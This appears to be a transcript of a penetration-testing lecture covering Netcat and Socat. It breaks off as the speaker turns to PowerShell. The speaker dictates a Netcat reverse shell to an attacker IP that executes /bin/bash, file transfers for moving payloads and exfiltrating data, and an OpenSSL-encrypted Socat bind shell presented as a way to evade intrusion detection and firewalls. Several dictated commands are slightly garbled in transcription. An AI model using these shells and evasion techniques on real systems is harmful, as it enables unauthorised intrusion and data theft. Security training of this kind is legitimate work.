Hello and welcome everyone. Today we're going to explore some of the most essential tools used in penetration testing. As security professionals, we often find ourselves in situations where we have limited resources. Maybe we're working with only built-in system tools or can only transfer small files to a target machine. This is why understanding practical, versatile tools is crucial for real-world pen testing. In this presentation, we'll cover four major categories: Netcat, Socat, PowerShell/PowerCat, and Wireshark/TCP/dump. These tools allow us to establish connections, transfer files, gain remote access, and analyze network traffic. By the end of this session, you'll have a strong grasp of these tools and how to use them effectively. So, without losing much time, let's get started. First up, we have Netcat, often referred to as the Swiss Army knife of networking. Netcat, or simply NC, is a command line tool that enables reading and writing data across network connections using the TCP and UDP protocols. It's lightweight, incredibly versatile, and is commonly used for tasks like banner grabbing, file transfers, remote administration, and even create backdoors. The reason Netcat is so valuable is its simplicity and flexibility. It doesn't require installation on many systems, making it a go-to tool when working with restricted environments. In the next slides, we'll explore Netcat's key functionalities, starting with how to connect to a remote system. One of Netcat's fundamental uses is connecting to a target system over a specified port. This is useful for checking if a service is running and even interacting with it directly. For example, if we want to check if a web server is active on port 80, we can use nc-v and then we type in the target IP address and then 80, which would be the port number. This command attempts to establish a connection with the target and, if successful, allows us to interact with the service manually. This is particularly useful for banner grabbing, where we can gather information about the running service, such as its version. Similarly, we can use Netcat to communicate with open ports on IoT devices, firewalls, or even backdoor services left open by malware. Now, let's move on to how we can use Netcat to listen for incoming connections. Listening on a TCP/UDP port using Netcat. Netcat can also be used to listen for incoming connections, essentially acting as a basic server. This is particularly useful when setting up backdoors or testing services. To start a listener on port 4444, we use nc-l-p and then the port number, which in this case is 4444. Any data sent to this port will be displayed on the screen, allowing us to capture messages or interact with the remote system. This is a common technique for creating simple chat applications or debugging network services. In red teaming scenarios, attackers might use this technique to set up backdoors, allowing them to regain access to a compromised machine. Now, let's look at how Netcat can be used for file transfers. How to transfer files using Netcat. Another powerful feature of Netcat is its ability to transfer files between machines without requiring additional tools. This is useful when working with limited resources. To send a file, we use cat, and then we mention the file we want to send, and then pipe, and then nc, and we mention the target IP address, and then we mention the port number. In this case, we chose 4444. On the receiving end, we set up a listener with the command nc-l-p 44 and then the greater than sign, and then the file we will be receiving. In this case, myfile.txt. This would transfer the file directly over the network. Attackers often use this method to exfiltrate data, and defenders should be aware of this method when monitoring network traffic. Now, let's explore how Netcat is used for remote administration. Remote administration with Netcat. Netcat can also be used to create a reverse shell, allowing remote access to a compromised machine. A simple command can turn Netcat into a basic backdoor. On the attacker's machine, we set up a listener with the command nc-l for listen, -b to mention the port number, and then we write the port number, in this case 4444. Then on the target system, we execute nc, and then we mention the attacker IP address, and then we mention the port number 4444 in this case, and then -e for execute, and then /bin/bash. This gives us remote shell access to the target. This technique is often used in CTF catch the flag challenges and real-world attacks. However, many security tools can detect Netcat, which is why attackers often use its more advanced alternative, which is Socat. Socat. Socat is like Netcat on steroids. It supports multiple protocols, allows for encrypted communication, and can even proxy connections. It's an excellent choice for situations where Netcat is too limited. For example, Socat can transfer files, set up reverse shells, and even relay traffic between different network segments. Let's see how we can use it for file transfers. Now, let's explore how we can use Socat for file transfers. In penetration testing, transferring files between machines is a crucial step. Whether we need to upload and exploit, move tools onto a compromised system, or exfiltrate data, Socat provides a flexible way to transfer files, especially in restricted environments where traditional methods may not work. Unlike Netcat, Socat offers more control over connections and supports encrypted transfers, making it a stealthier alternative. While we can use tools like SCP or FTP for file transfers, these are often monitored or blocked. Socat allows us to bypass security measures by sending files over raw TCP connections, which can blend in with legitimate traffic. Let's start with a simple example for transferring text from one machine to another using Socat. On the sending machine, we execute echo hello pipe socat -tcp column, and then we mention the target IP address, and then column, and then 4444, which is gonna be an arbitrary port number, which you would replace with your preferred port number. Echo hello generates a simple message. Pipe socat -tcp column target IP address column 4444 pipes the message into Socat and sends it over TCP to the target machine's port 4444. Now on the receiving machine, we run Socat -tcp-listen column 4444. TCP-listen column 4444 tells Socat to listen on port 4444 and accept incoming connections. Once the sender runs the command, the text hello will appear on the receiver's terminal, confirming that data was successfully transferred. Now let's move beyond simple text and actually transfer a file. Suppose we want to send payload.exe from our attack machine to a compromised system. On the attacker's machine, the sending end, we need to run the command socat-u file column payload.exe TCP column target IP address column 4444. -u ensures that data is sent unidirectionally, avoiding buffering issues. File column payload.exe tells Socat to read from a file instead of standard input. TCP column target IP address column 4444 sends the file over TCP to the target machine. On the victim's machine, the receiving end, we set up a listener with the command here socat-u tcp-listen column 4444 file column the received underscore payload.exe, which is going to be the file that will receive from the sending end. TCP-listen column 4444 waits for the incoming data on port 4444. File column received underscore payload.exe writes the received data to a file. After executing both commands, payload.exe will be transferred to the target machine, making this a quick and efficient way to move files during a pen test. Why use Socat for file transfers? Well, the first reason would be to bypass security restrictions. Many organizations block traditional file transfer methods, but Socat can be used over commonly open ports like 80, 443 or 53 to evade detection. Socat is more stealthy than Netcat. In this case, Netcat file transfers are well known and often flagged by security tools, while Socat's use of different protocols helps it blend in. Socat also supports encryption. By integrating OpenSSL, we can encrypt file transfers, making it even harder to detect. With these techniques, we can efficiently move tools onto a compromised system while staying under the radar. Next, let's take this further by looking at how Socat can be used to set up reverse shells and encrypted bind shells. Using Socat in reverse shells and encrypted bind shells. Now, let's take a deeper look at Socat and why it's an essential tool for penetration testers. As we've discussed, Socat is an advanced alternative to Netcat, offering more flexibility and security. One of its biggest advantages is its ability to encrypt traffic, making it harder to detect during pen tests. Many network monitoring solutions and intrusion detection systems can flag plain text Netcat connections, but with Socat, we can encrypt our communication, making it significantly harder for defenders to spot suspicious activity. This is especially useful when setting up reverse shells or bind shells, which are crucial for maintaining remote access on a compromised machine. Let's first look at how we can establish a secure bind shell. In a traditional bind shell setup, the target machine listens for incoming connections and the attacker connects to it. However, this leaves the connection exposed. By using OpenSSL with Socat, we can encrypt the entire session, preventing network defenders from easily inspecting our traffic. On the target machine, which will act as the listener, we run the command here, socat space OpenSSL-listen column 4444. In this case, it's the port number that we have chosen for this communication, comma, cert cert.bem, comma, verify text to value 0, then space exec column /bin/bash. OpenSSL-listen column 4444 tells Socat to listen on port 4444 using OpenSSL encryption. Cert cert.bem specifies the SSL certificate used for encryption. Verify text value 0 disables certificate verification, making it easier to establish a connection without authentication. Exec column /bin/bash spawns a bash shell, giving the attacker full control over the target system. Now, from the attacker's machine, we connect to the shell using the command here, socat space OpenSSL column and then we input the target IP address, and then column 4444, comma, verify, takes the value 0, and then dash. OpenSSL, column target IP address, column 4444, connects securely to the target on port 4444 using OpenSSL. Verify takes the value 0, disables verification for ease of use, and then the dash, which tells Socat to forward input-output, essentially giving us an interactive shell. Once connected, we now have an encrypted shell that is much harder to detect than a traditional Netcat shell. So why use an encrypted shell? The first obvious reason would be to avoid intrusion detection and prevention system detection. Since the traffic is encrypted, security devices won't be able to inspect the session for malicious activity. Second reason would be to bypass firewalls. Some firewalls block unencrypted Netcat connections but might allow OpenSSL traffic. The increased stealth of Socat over Netcat. Since encrypted connections blend in with normal HTTPS traffic, reducing the risk of detection. With this approach, we can maintain a persistent and secure foothold on the compromised machine. Now that we've covered Socat's encrypted shells, let's move on to PowerShell tools, which are incredibly useful for Windows-based environments.